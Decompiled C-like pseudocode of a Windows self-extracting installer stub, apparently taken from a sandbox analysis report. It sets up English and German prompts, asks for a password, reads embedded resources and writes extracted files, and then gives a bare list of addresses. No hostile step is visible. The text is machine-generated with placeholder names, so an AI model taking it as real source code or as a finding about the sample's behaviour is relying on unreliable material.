                                                                                                                                                              				int _t222;
                                                                                                                                                              				void* _t224;
                                                                                                                                                              				void* _t226;
                                                                                                                                                              				intOrPtr _t242;
                                                                                                                                                              				intOrPtr _t247;
                                                                                                                                                              				void* _t261;
                                                                                                                                                              				intOrPtr _t262;
                                                                                                                                                              				void* _t263;
                                                                                                                                                              				void* _t278;
                                                                                                                                                              				void* _t279;
                                                                                                                                                              				void* _t280;
                                                                                                                                                              				intOrPtr _t281;
                                                                                                                                                              				intOrPtr _t283;
                                                                                                                                                              				void* _t284;
                                                                                                                                                              				intOrPtr _t285;
                                                                                                                                                              				intOrPtr _t286;
                                                                                                                                                              				intOrPtr _t287;
                                                                                                                                                              				intOrPtr _t288;
                                                                                                                                                              				intOrPtr _t289;
                                                                                                                                                              				intOrPtr _t290;
                                                                                                                                                              				void* _t291;
                                                                                                                                                              				intOrPtr _t293;
                                                                                                                                                              				void* _t294;
                                                                                                                                                              				intOrPtr _t295;
                                                                                                                                                              				intOrPtr _t296;
                                                                                                                                                              				intOrPtr _t297;
                                                                                                                                                              				intOrPtr _t298;
                                                                                                                                                              				void* _t299;
                                                                                                                                                              				intOrPtr _t300;
                                                                                                                                                              				intOrPtr _t301;
                                                                                                                                                              				intOrPtr _t303;
                                                                                                                                                              				intOrPtr _t305;
                                                                                                                                                              				intOrPtr _t306;
                                                                                                                                                              				intOrPtr _t307;
                                                                                                                                                              				intOrPtr _t308;
                                                                                                                                                              				void* _t309;
                                                                                                                                                              				void* _t310;
                                                                                                                                                              				void* _t312;
                                                                                                                                                              				intOrPtr _t313;
                                                                                                                                                              				void* _t316;
                                                                                                                                                              				void* _t330;
                                                                                                                                                              				void* _t331;
                                                                                                                                                              				void* _t332;
                                                                                                                                                              				intOrPtr* _t333;
                                                                                                                                                              				void* _t340;
                                                                                                                                                              
                                                                                                                                                              				_t340 = __eflags;
                                                                                                                                                              				_t331 = __esi;
                                                                                                                                                              				_t330 = __edi;
                                                                                                                                                              				_t261 = __edx;
                                                                                                                                                              				_t224 = __ecx;
                                                                                                                                                              				memset(0x40b0f8, 0, 0xc4);
                                                                                                                                                              				_t333 = _t332 + 0xc;
                                                                                                                                                              				 *0x40b0fc = GetModuleHandleA(0);
                                                                                                                                                              				_t9 = HeapCreate(0, 0x1000, 0); // executed
                                                                                                                                                              				 *0x40b0f8 = _t9;
                                                                                                                                                              				E00403000(_t261); // executed
                                                                                                                                                              				E00407470(); // executed
                                                                                                                                                              				E00406807();
                                                                                                                                                              				E00406040();
                                                                                                                                                              				E00404AB3(); // executed
                                                                                                                                                              				E004040E0(_t224); // executed
                                                                                                                                                              				E00403D90();
                                                                                                                                                              				E0040393B();
                                                                                                                                                              				E00403694();
                                                                                                                                                              				_push(7);
                                                                                                                                                              				_push(0x40a388);
                                                                                                                                                              				 *0x40b1b4 = E00403EF0(8, 0x40b1b8);
                                                                                                                                                              				_push(7);
                                                                                                                                                              				_push(0x40b1ac);
                                                                                                                                                              				_t262 =  *0x40b1ac; // 0x21412d0
                                                                                                                                                              				E00403060(_t20, _t262);
                                                                                                                                                              				E004030A0(0x401, 8, 0x40a380);
                                                                                                                                                              				 *0x40b130 = E00403DC0(0x400);
                                                                                                                                                              				VerLanguageNameA(GetUserDefaultLangID(),  *0x40b130, 8); // executed
                                                                                                                                                              				CharLowerA( *0x40b130);
                                                                                                                                                              				_t28 =  *0x40b3b0; // 0x0
                                                                                                                                                              				_push(_t28);
                                                                                                                                                              				E00403DE0( *0x40b130, 8);
                                                                                                                                                              				_t263 = _t28;
                                                                                                                                                              				E004030F0(0x40b134, _t263);
                                                                                                                                                              				E00403E30( *0x40b130);
                                                                                                                                                              				_push( *0x40b134);
                                                                                                                                                              				_pop(_t226);
                                                                                                                                                              				E004074C0(_t226, "deutsch");
                                                                                                                                                              				if(_t340 == 0) {
                                                                                                                                                              					E00403108(0x40b138, "Continue?");
                                                                                                                                                              					E00403108(0x40b13c, "Error!");
                                                                                                                                                              					E00403108(0x40b140, "Can not create some of your include files.");
                                                                                                                                                              					E00403108(0x40b144, "Can not allocate the memory.");
                                                                                                                                                              					E00403108(0x40b148, "Wrong password.");
                                                                                                                                                              					E00403108(0x40b14c, "Overwrite?");
                                                                                                                                                              					E00403108(0x40b150, "The file ");
                                                                                                                                                              					E00403108(0x40b154, " already exists in the current directory. Overwrite?");
                                                                                                                                                              					E00403108(0x40b158, "An unknown error occured. The program will be terminated.");
                                                                                                                                                              					E00403108(0x40b15c, "This program is not supported on this operating system.");
                                                                                                                                                              					E00403108(0x40b160, "Choose a location to save the files.");
                                                                                                                                                              					E00403108(0x40b164, "Password");
                                                                                                                                                              					_t239 = 0x40b168;
                                                                                                                                                              					E00403108(0x40b168, "Please enter the password.");
                                                                                                                                                              				} else {
                                                                                                                                                              					E00403108(0x40b138, "Fortfahren?");
                                                                                                                                                              					E00403108(0x40b13c, "Fehler!");
                                                                                                                                                              					E00403108(0x40b140, "Einige Include Dateien konnten nicht erstellt werden.");
                                                                                                                                                              					E00403108(0x40b144, 0x40a178);
                                                                                                                                                              					E00403108(0x40b148, "Falsches Passwort.");
                                                                                                                                                              					E00403108(0x40b14c, 0x40a113);
                                                                                                                                                              					E00403108(0x40b150, "Die Datei ");
                                                                                                                                                              					E00403108(0x40b154, 0x40a24e);
                                                                                                                                                              					E00403108(0x40b158, "Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.");
                                                                                                                                                              					E00403108(0x40b15c, 0x40a294);
                                                                                                                                                              					E00403108(0x40b160, 0x40a03b);
                                                                                                                                                              					E00403108(0x40b164, "Passwort");
                                                                                                                                                              					_t239 = 0x40b168;
                                                                                                                                                              					E00403108(0x40b168, "Bitte geben Sie das Passwort ein.");
                                                                                                                                                              				}
                                                                                                                                                              				if(E00403CD7() >= 0x32) {
                                                                                                                                                              					E00403B70(E0040208E);
                                                                                                                                                              					 *0x40b170 = E00403A66(_t239);
                                                                                                                                                              					 *0x40b174 = GetModuleHandleA(0);
                                                                                                                                                              					_t213 =  *0x40b170; // 0x0
                                                                                                                                                              					__eflags = _t213;
                                                                                                                                                              					if(_t213 > 0) {
                                                                                                                                                              						 *0x40b178 = 0;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							_t222 =  *0x40b170; // 0x0
                                                                                                                                                              							__eflags = _t222 - 1 -  *0x40b178; // 0x0
                                                                                                                                                              							if(__eflags < 0) {
                                                                                                                                                              								goto L9;
                                                                                                                                                              							}
                                                                                                                                                              							_t313 =  *0x40b17c; // 0x0
                                                                                                                                                              							_push( *0x40b3b0);
                                                                                                                                                              							E004074F0(_t313);
                                                                                                                                                              							E004074F0(0x40a011);
                                                                                                                                                              							_t193 =  *0x40b3b0; // 0x0
                                                                                                                                                              							E00403A18(_t239,  *0x40b178, _t193);
                                                                                                                                                              							E004074F0("\" ");
                                                                                                                                                              							_t239 = 0x40b17c;
                                                                                                                                                              							_t316 = _t193;
                                                                                                                                                              							E004030F0(0x40b17c, _t316);
                                                                                                                                                              							 *0x40b178 =  *0x40b178 + 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L9:
                                                                                                                                                              					__eflags = E004020B1( *0x40b174, "OPS");
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						_push(0x10);
                                                                                                                                                              						E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                              						ExitProcess(1);
                                                                                                                                                              					} else {
                                                                                                                                                              						_t62 =  *0x40b130; // 0x40c154
                                                                                                                                                              						 *0x40b180 = _t62;
                                                                                                                                                              						E00401BDD(__eflags,  *0x40b180);
                                                                                                                                                              						_t64 = E004020B1( *0x40b174, "NOPS");
                                                                                                                                                              						__eflags = _t64;
                                                                                                                                                              						if(_t64 == 0) {
                                                                                                                                                              							_push(0x10);
                                                                                                                                                              							E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                              							ExitProcess(1);
                                                                                                                                                              						} else {
                                                                                                                                                              							_t67 =  *0x40b3b0; // 0x0
                                                                                                                                                              							_push(_t67);
                                                                                                                                                              							E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                              							_t239 = 0x40b184;
                                                                                                                                                              							_t278 = _t67;
                                                                                                                                                              							E004030F0(0x40b184, _t278);
                                                                                                                                                              							_t70 = E004020B1( *0x40b174, "BDFINOPS");
                                                                                                                                                              							__eflags = _t70;
                                                                                                                                                              							if(_t70 == 0) {
                                                                                                                                                              								_push(0x10);
                                                                                                                                                              								E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                              								ExitProcess(1);
                                                                                                                                                              							} else {
                                                                                                                                                              								_t73 =  *0x40b130; // 0x40c154
                                                                                                                                                              								 *0x40b188 = _t73;
                                                                                                                                                              								_t74 =  *0x40b16c; // 0x15c
                                                                                                                                                              								 *0x40b110 = _t74;
                                                                                                                                                              								_t75 =  *0x40b188; // 0x40c154
                                                                                                                                                              								 *0x40b104 = _t75;
                                                                                                                                                              								_t76 = E004020B1( *0x40b174, "INOPS");
                                                                                                                                                              								__eflags = _t76;
                                                                                                                                                              								if(_t76 != 0) {
                                                                                                                                                              									_t188 =  *0x40b130; // 0x40c154
                                                                                                                                                              									 *0x40b18c = _t188;
                                                                                                                                                              									_t189 =  *0x40b16c; // 0x15c
                                                                                                                                                              									 *0x40b114 = _t189;
                                                                                                                                                              									_t190 =  *0x40b18c; // 0x0
                                                                                                                                                              									 *0x40b108 = _t190;
                                                                                                                                                              								}
                                                                                                                                                              								_t78 = E004020B1( *0x40b174, "FINOPS");
                                                                                                                                                              								__eflags = _t78;
                                                                                                                                                              								if(_t78 != 0) {
                                                                                                                                                              									_t185 =  *0x40b130; // 0x40c154
                                                                                                                                                              									 *0x40b190 = _t185;
                                                                                                                                                              									_t186 =  *0x40b16c; // 0x15c
                                                                                                                                                              									 *0x40b118 = _t186;
                                                                                                                                                              									_t187 =  *0x40b190; // 0x0
                                                                                                                                                              									 *0x40b10c = _t187;
                                                                                                                                                              								}
                                                                                                                                                              								_t80 = E004020B1( *0x40b174, 0x40a0c8);
                                                                                                                                                              								__eflags = _t80;
                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                              									L40:
                                                                                                                                                              									_t82 =  *0x40b3b0; // 0x0
                                                                                                                                                              									_push(_t82);
                                                                                                                                                              									E00403DE0( *0x40b104,  *0x40b110);
                                                                                                                                                              									_t279 = _t82;
                                                                                                                                                              									E004030F0(0x40b19c, _t279);
                                                                                                                                                              									_t85 =  *0x40b3b0; // 0x0
                                                                                                                                                              									_push(_t85);
                                                                                                                                                              									E00403DE0( *0x40b108,  *0x40b114);
                                                                                                                                                              									_t280 = _t85;
                                                                                                                                                              									E004030F0(0x40b1a0, _t280);
                                                                                                                                                              									_t88 = E004020B1( *0x40b174, "DFINOPS");
                                                                                                                                                              									__eflags = _t88;
                                                                                                                                                              									if(_t88 == 0) {
                                                                                                                                                              										L55:
                                                                                                                                                              										_t281 =  *0x40b12c; // 0x2264840
                                                                                                                                                              										_push( *0x40b3b0);
                                                                                                                                                              										E004074F0(_t281);
                                                                                                                                                              										E004074F0(0x40a0ba);
                                                                                                                                                              										_t283 =  *0x40b184; // 0x22649f0
                                                                                                                                                              										E004074F0(_t283);
                                                                                                                                                              										_t239 = 0x40b184;
                                                                                                                                                              										_pop(_t284);
                                                                                                                                                              										E004030F0(0x40b184, _t284);
                                                                                                                                                              										_push( *0x40b184);
                                                                                                                                                              										_t94 = E00406170(__eflags, 1);
                                                                                                                                                              										__eflags = _t94;
                                                                                                                                                              										if(_t94 == 0) {
                                                                                                                                                              											E00405EA0( *0x40b184);
                                                                                                                                                              											E00402025();
                                                                                                                                                              											_push(0x10);
                                                                                                                                                              											E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                              											_push( *0x40b12c);
                                                                                                                                                              											L00403196();
                                                                                                                                                              											ExitProcess(1);
                                                                                                                                                              										} else {
                                                                                                                                                              											E00406250(_t330, 1,  *0x40b19c);
                                                                                                                                                              											E00405FD0(1);
                                                                                                                                                              											_t285 =  *0x40b1a0; // 0x2264828
                                                                                                                                                              											_t239 = 0;
                                                                                                                                                              											__eflags = 0;
                                                                                                                                                              											E004074C0(0, _t285);
                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                              												_push( *0x40b1a0);
                                                                                                                                                              												E00402118();
                                                                                                                                                              											}
                                                                                                                                                              											_push( *0x40b3b0);
                                                                                                                                                              											_t286 =  *0x40b17c; // 0x0
                                                                                                                                                              											_push( *0x40b3b0);
                                                                                                                                                              											E004074F0(_t286);
                                                                                                                                                              											_t287 =  *0x40b128; // 0x0
                                                                                                                                                              											E004074F0(_t287);
                                                                                                                                                              											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              											_push( *0x40b124);
                                                                                                                                                              											_push( *0x40b184);
                                                                                                                                                              											_t288 =  *0x40a390; // 0x22606f0
                                                                                                                                                              											_v44 = _v44 + _t288;
                                                                                                                                                              											E00402761();
                                                                                                                                                              											_pop( *0x40b3b0);
                                                                                                                                                              											E00402025();
                                                                                                                                                              											E00405EA0( *0x40b184); // executed
                                                                                                                                                              											_push( *0x40b3b0);
                                                                                                                                                              											_t108 =  *0x40b3b0; // 0x0
                                                                                                                                                              											E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                              											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              											_t289 =  *0x40a390; // 0x22606f0
                                                                                                                                                              											 *_t333 =  *_t333 + _t289;
                                                                                                                                                              											_t110 = E00405E15(_t108, _t108);
                                                                                                                                                              											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              											_t290 =  *0x40a390; // 0x22606f0
                                                                                                                                                              											 *_t333 =  *_t333 + _t290; // executed
                                                                                                                                                              											E00405E90(_t110,  *0x40b3b0); // executed
                                                                                                                                                              											_pop( *0x40b3b0);
                                                                                                                                                              											_push( *0x40b12c); // executed
                                                                                                                                                              											L00403196(); // executed
                                                                                                                                                              											ExitProcess(0);
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										_t113 =  *0x40b3b0; // 0x0
                                                                                                                                                              										_push(_t113);
                                                                                                                                                              										E00403A18(0x40b1a0, 0, _t113);
                                                                                                                                                              										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              										_t115 =  *0x40b3b0; // 0x0
                                                                                                                                                              										E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                              										_t291 = _t115;
                                                                                                                                                              										_t242 = _t115;
                                                                                                                                                              										 *0x40b3b0 = _t242;
                                                                                                                                                              										_t243 = _t242 +  *0x40a390;
                                                                                                                                                              										__eflags = _t291 +  *0x40a390;
                                                                                                                                                              										E004074C0(_t242 +  *0x40a390, _t291 +  *0x40a390);
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											L44:
                                                                                                                                                              											_t118 = 0;
                                                                                                                                                              											__eflags = 0;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t216 =  *0x40b170; // 0x0
                                                                                                                                                              											__eflags = _t216 - 1;
                                                                                                                                                              											if(_t216 != 1) {
                                                                                                                                                              												goto L44;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t118 = 1;
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = _t118;
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											goto L55;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t120 =  *0x40b3b0; // 0x0
                                                                                                                                                              											_t121 =  *0x40b3b0; // 0x0
                                                                                                                                                              											E00405DD5(__eflags, _t121);
                                                                                                                                                              											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              											_t293 =  *0x40a390; // 0x22606f0
                                                                                                                                                              											_v52 = _v52 + _t293;
                                                                                                                                                              											E004036F8(_t243, _t331,  *0x40b160, _t121, _t120);
                                                                                                                                                              											_t294 = _t120;
                                                                                                                                                              											E004030F0(0x40b1a4, _t294);
                                                                                                                                                              											_t295 =  *0x40b1a4; // 0x0
                                                                                                                                                              											_t239 = 0;
                                                                                                                                                              											__eflags = 0;
                                                                                                                                                              											E004074C0(0, _t295);
                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                              												L54:
                                                                                                                                                              												_t126 =  *0x40b3b0; // 0x0
                                                                                                                                                              												_t127 =  *0x40b3b0; // 0x0
                                                                                                                                                              												E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                              												 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              												_t296 =  *0x40a390; // 0x22606f0
                                                                                                                                                              												 *_t333 =  *_t333 + _t296;
                                                                                                                                                              												_t129 = E00405E15(_t127, _t127);
                                                                                                                                                              												 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              												_t297 =  *0x40a390; // 0x22606f0
                                                                                                                                                              												 *_t333 =  *_t333 + _t297;
                                                                                                                                                              												E00405E90(_t129, _t126);
                                                                                                                                                              												 *0x40b3b0 = _t126;
                                                                                                                                                              												_push( *0x40b12c);
                                                                                                                                                              												L00403196();
                                                                                                                                                              												ExitProcess(0);
                                                                                                                                                              											} else {
                                                                                                                                                              												_t298 =  *0x40b1a4; // 0x0
                                                                                                                                                              												_push( *0x40b3b0);
                                                                                                                                                              												E004074F0(_t298);
                                                                                                                                                              												_pop(_t299);
                                                                                                                                                              												E004030F0(0x40b124, _t299);
                                                                                                                                                              												_t300 =  *0x40b1a0; // 0x2264828
                                                                                                                                                              												_t239 = 0;
                                                                                                                                                              												__eflags = 0;
                                                                                                                                                              												E004074C0(0, _t300);
                                                                                                                                                              												if(__eflags == 0) {
                                                                                                                                                              													_push( *0x40b1a0);
                                                                                                                                                              													E00402118();
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = E00406230(1,  *0x40b184);
                                                                                                                                                              												if(__eflags == 0) {
                                                                                                                                                              													L52:
                                                                                                                                                              													_push( *0x40b184);
                                                                                                                                                              													__eflags = E00406170(__eflags, 1);
                                                                                                                                                              													if(__eflags != 0) {
                                                                                                                                                              														E00406250(_t330, 1,  *0x40b19c);
                                                                                                                                                              														E00405FD0(1);
                                                                                                                                                              													}
                                                                                                                                                              													goto L54;
                                                                                                                                                              												} else {
                                                                                                                                                              													E00405FD0(1);
                                                                                                                                                              													_push( *0x40b3b0);
                                                                                                                                                              													_t301 =  *0x40b150; // 0x2260588
                                                                                                                                                              													E004074F0(_t301);
                                                                                                                                                              													E004074F0(0x40a011);
                                                                                                                                                              													_t303 =  *0x40b184; // 0x22649f0
                                                                                                                                                              													E004074F0(_t303);
                                                                                                                                                              													E004074F0(0x40a011);
                                                                                                                                                              													_t305 =  *0x40b154; // 0x22605a0
                                                                                                                                                              													E004074F0(_t305);
                                                                                                                                                              													 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              													_t306 =  *0x40a390; // 0x22606f0
                                                                                                                                                              													_v52 = _v52 + _t306;
                                                                                                                                                              													_t146 = E004036A2( *0x40b14c,  *0x40b3b0);
                                                                                                                                                              													 *0x40b3b0 = 0x24;
                                                                                                                                                              													 *0x40b1a8 = _t146;
                                                                                                                                                              													_t215 =  *0x40b1a8; // 0x0
                                                                                                                                                              													__eflags = _t215 - 7;
                                                                                                                                                              													if(__eflags != 0) {
                                                                                                                                                              														goto L52;
                                                                                                                                                              													} else {
                                                                                                                                                              														_t147 =  *0x40b3b0; // 0x0
                                                                                                                                                              														_t148 =  *0x40b3b0; // 0x0
                                                                                                                                                              														E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                              														 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              														_t307 =  *0x40a390; // 0x22606f0
                                                                                                                                                              														 *_t333 =  *_t333 + _t307;
                                                                                                                                                              														_t150 = E00405E15(_t148, _t148);
                                                                                                                                                              														 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              														_t308 =  *0x40a390; // 0x22606f0
                                                                                                                                                              														 *_t333 =  *_t333 + _t308;
                                                                                                                                                              														E00405E90(_t150, _t147);
                                                                                                                                                              														 *0x40b3b0 = _t147;
                                                                                                                                                              														_push( *0x40b12c);
                                                                                                                                                              														L00403196();
                                                                                                                                                              														ExitProcess(0);
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									E00404DE6(0, 0, 0, 0xc8, 0x6e,  *0x40b164, 0xc80001);
                                                                                                                                                              									E004042BD(1, 0x15, 0xf, 0x9e, 0x14,  *0x40b168);
                                                                                                                                                              									E004043AE(2, 0x15, 0x28, 0x9e, 0x14, 0x40a00d, 0x20);
                                                                                                                                                              									E004045B3(3, 0x3d, 0x4b, 0x4e, 0x14, "OK");
                                                                                                                                                              									E00404E09(_t239, __eflags, 0, 0xd, 4);
                                                                                                                                                              									E004045D3(2);
                                                                                                                                                              									while(1) {
                                                                                                                                                              										_push(E0040505E());
                                                                                                                                                              										__eflags = 0x10 -  *_t333;
                                                                                                                                                              										if(0x10 ==  *_t333) {
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = 0x332d -  *_t333;
                                                                                                                                                              										if(0x332d !=  *_t333) {
                                                                                                                                                              											__eflags = 0x332c -  *_t333;
                                                                                                                                                              											if(0x332c !=  *_t333) {
                                                                                                                                                              												goto L34;
                                                                                                                                                              											} else {
                                                                                                                                                              												_push(E00405074());
                                                                                                                                                              												__eflags = 3 -  *_t333;
                                                                                                                                                              												if(__eflags != 0) {
                                                                                                                                                              													goto L34;
                                                                                                                                                              												} else {
                                                                                                                                                              													_t163 =  *0x40b3b0; // 0x0
                                                                                                                                                              													E004045FC(__eflags, 2, _t163);
                                                                                                                                                              													_t309 = _t163;
                                                                                                                                                              													E004030F0(0x40b194, _t309);
                                                                                                                                                              													E00404925(_t330, __eflags, 0);
                                                                                                                                                              													_t333 = _t333 + 8;
                                                                                                                                                              													goto L35;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										} else {
                                                                                                                                                              											_push(E00405066());
                                                                                                                                                              											__eflags = 4 -  *_t333;
                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                              												L34:
                                                                                                                                                              												continue;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t181 =  *0x40b3b0; // 0x0
                                                                                                                                                              												E004045FC(__eflags, 2, _t181);
                                                                                                                                                              												_t312 = _t181;
                                                                                                                                                              												E004030F0(0x40b194, _t312);
                                                                                                                                                              												E00404925(_t330, __eflags, 0);
                                                                                                                                                              												_t333 = _t333 + 8;
                                                                                                                                                              												L35:
                                                                                                                                                              												_t167 =  *0x40b3b0; // 0x0
                                                                                                                                                              												_push(_t167);
                                                                                                                                                              												_t168 = E004031F0( *0x40b194);
                                                                                                                                                              												_t169 =  *0x40b194; // 0x0
                                                                                                                                                              												E00406860(__eflags, _t169, _t168, _t167);
                                                                                                                                                              												 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              												_t171 =  *0x40b3b0; // 0x0
                                                                                                                                                              												E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                              												_t310 = _t171;
                                                                                                                                                              												_t247 = _t171;
                                                                                                                                                              												 *0x40b3b0 = _t247;
                                                                                                                                                              												_t239 = _t247 +  *0x40a390;
                                                                                                                                                              												__eflags = _t310 +  *0x40a390;
                                                                                                                                                              												E004074C0(_t247 +  *0x40a390, _t310 +  *0x40a390);
                                                                                                                                                              												if(__eflags != 0) {
                                                                                                                                                              													_t174 = E004020B1( *0x40b174, 0x40a0ca);
                                                                                                                                                              													__eflags = _t174;
                                                                                                                                                              													if(_t174 != 0) {
                                                                                                                                                              														_t177 =  *0x40b130; // 0x40c154
                                                                                                                                                              														 *0x40b198 = _t177;
                                                                                                                                                              													}
                                                                                                                                                              													_push( *0x40b118);
                                                                                                                                                              													_push( *0x40b114);
                                                                                                                                                              													_push( *0x40b110);
                                                                                                                                                              													_push( *0x40b198);
                                                                                                                                                              													_push( *0x40b190);
                                                                                                                                                              													_push( *0x40b18c);
                                                                                                                                                              													_push( *0x40b188);
                                                                                                                                                              													_push( *0x40b194);
                                                                                                                                                              													_push( *0x40b174);
                                                                                                                                                              													E00401D3F();
                                                                                                                                                              													goto L40;
                                                                                                                                                              												} else {
                                                                                                                                                              													_push(0x10);
                                                                                                                                                              													E004036A2( *0x40b13c,  *0x40b148);
                                                                                                                                                              													_push( *0x40b12c);
                                                                                                                                                              													L00403196();
                                                                                                                                                              													ExitProcess(1);
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										goto L62;
                                                                                                                                                              									}
                                                                                                                                                              									_push( *0x40b12c);
                                                                                                                                                              									L00403196();
                                                                                                                                                              									ExitProcess(0);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_push(0x10);
                                                                                                                                                              					E004036A2( *0x40b13c,  *0x40b15c);
                                                                                                                                                              					ExitProcess(0);
                                                                                                                                                              				}
                                                                                                                                                              				L62:
                                                                                                                                                              				HeapDestroy( *0x40b0f8); // executed
                                                                                                                                                              				ExitProcess(??); // executed
                                                                                                                                                              				E00403B0B();
                                                                                                                                                              				E00403DB0(E00403CC0());
                                                                                                                                                              				E00404150();
                                                                                                                                                              				E00404A13(_t239);
                                                                                                                                                              				return E0040681C(E00406030());
                                                                                                                                                              			}


































































































                                                                                                                                                              0x00401000
                                                                                                                                                              0x00401000
                                                                                                                                                              0x00401000
                                                                                                                                                              0x00401000
                                                                                                                                                              0x00401000
                                                                                                                                                              0x0040100f
                                                                                                                                                              0x00401014
                                                                                                                                                              0x00401021
                                                                                                                                                              0x00401035
                                                                                                                                                              0x0040103a
                                                                                                                                                              0x0040103f
                                                                                                                                                              0x00401044
                                                                                                                                                              0x00401049
                                                                                                                                                              0x0040104e
                                                                                                                                                              0x00401053
                                                                                                                                                              0x00401058
                                                                                                                                                              0x0040105d
                                                                                                                                                              0x00401062
                                                                                                                                                              0x00401067
                                                                                                                                                              0x0040106c
                                                                                                                                                              0x00401071
                                                                                                                                                              0x00401087
                                                                                                                                                              0x0040108c
                                                                                                                                                              0x00401091
                                                                                                                                                              0x0040109b
                                                                                                                                                              0x004010a1
                                                                                                                                                              0x004010b0
                                                                                                                                                              0x004010bf
                                                                                                                                                              0x004010d5
                                                                                                                                                              0x004010e0
                                                                                                                                                              0x004010e5
                                                                                                                                                              0x004010ea
                                                                                                                                                              0x004010f7
                                                                                                                                                              0x00401102
                                                                                                                                                              0x00401103
                                                                                                                                                              0x0040110e
                                                                                                                                                              0x00401113
                                                                                                                                                              0x0040111e
                                                                                                                                                              0x0040111f
                                                                                                                                                              0x00401124
                                                                                                                                                              0x0040120a
                                                                                                                                                              0x0040121a
                                                                                                                                                              0x0040122a
                                                                                                                                                              0x0040123a
                                                                                                                                                              0x0040124a
                                                                                                                                                              0x0040125a
                                                                                                                                                              0x0040126a
                                                                                                                                                              0x0040127a
                                                                                                                                                              0x0040128a
                                                                                                                                                              0x0040129a
                                                                                                                                                              0x004012aa
                                                                                                                                                              0x004012ba
                                                                                                                                                              0x004012c4
                                                                                                                                                              0x004012ca
                                                                                                                                                              0x0040112a
                                                                                                                                                              0x00401135
                                                                                                                                                              0x00401145
                                                                                                                                                              0x00401155
                                                                                                                                                              0x00401165
                                                                                                                                                              0x00401175
                                                                                                                                                              0x00401185
                                                                                                                                                              0x00401195
                                                                                                                                                              0x004011a5
                                                                                                                                                              0x004011b5
                                                                                                                                                              0x004011c5
                                                                                                                                                              0x004011d5
                                                                                                                                                              0x004011e5
                                                                                                                                                              0x004011ef
                                                                                                                                                              0x004011f5
                                                                                                                                                              0x004011f5
                                                                                                                                                              0x004012d9
                                                                                                                                                              0x004012fd
                                                                                                                                                              0x00401307
                                                                                                                                                              0x00401316
                                                                                                                                                              0x0040131b
                                                                                                                                                              0x00401321
                                                                                                                                                              0x00401323
                                                                                                                                                              0x00401325
                                                                                                                                                              0x0040132f
                                                                                                                                                              0x0040132f
                                                                                                                                                              0x00401336
                                                                                                                                                              0x0040133c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040133e
                                                                                                                                                              0x00401344
                                                                                                                                                              0x0040134a
                                                                                                                                                              0x00401354
                                                                                                                                                              0x00401359
                                                                                                                                                              0x00401366
                                                                                                                                                              0x00401371
                                                                                                                                                              0x00401376
                                                                                                                                                              0x0040137c
                                                                                                                                                              0x0040137d
                                                                                                                                                              0x00401382
                                                                                                                                                              0x00401382
                                                                                                                                                              0x0040132f
                                                                                                                                                              0x0040138a
                                                                                                                                                              0x0040139a
                                                                                                                                                              0x0040139c
                                                                                                                                                              0x004013b5
                                                                                                                                                              0x004013c6
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x0040139e
                                                                                                                                                              0x0040139e
                                                                                                                                                              0x004013a3
                                                                                                                                                              0x004013ae
                                                                                                                                                              0x004013e0
                                                                                                                                                              0x004013e5
                                                                                                                                                              0x004013e7
                                                                                                                                                              0x0040140f
                                                                                                                                                              0x00401420
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x004013e9
                                                                                                                                                              0x004013e9
                                                                                                                                                              0x004013ee
                                                                                                                                                              0x004013fc
                                                                                                                                                              0x00401401
                                                                                                                                                              0x00401407
                                                                                                                                                              0x00401408
                                                                                                                                                              0x0040143a
                                                                                                                                                              0x0040143f
                                                                                                                                                              0x00401441
                                                                                                                                                              0x00401463
                                                                                                                                                              0x00401474
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401443
                                                                                                                                                              0x00401443
                                                                                                                                                              0x00401448
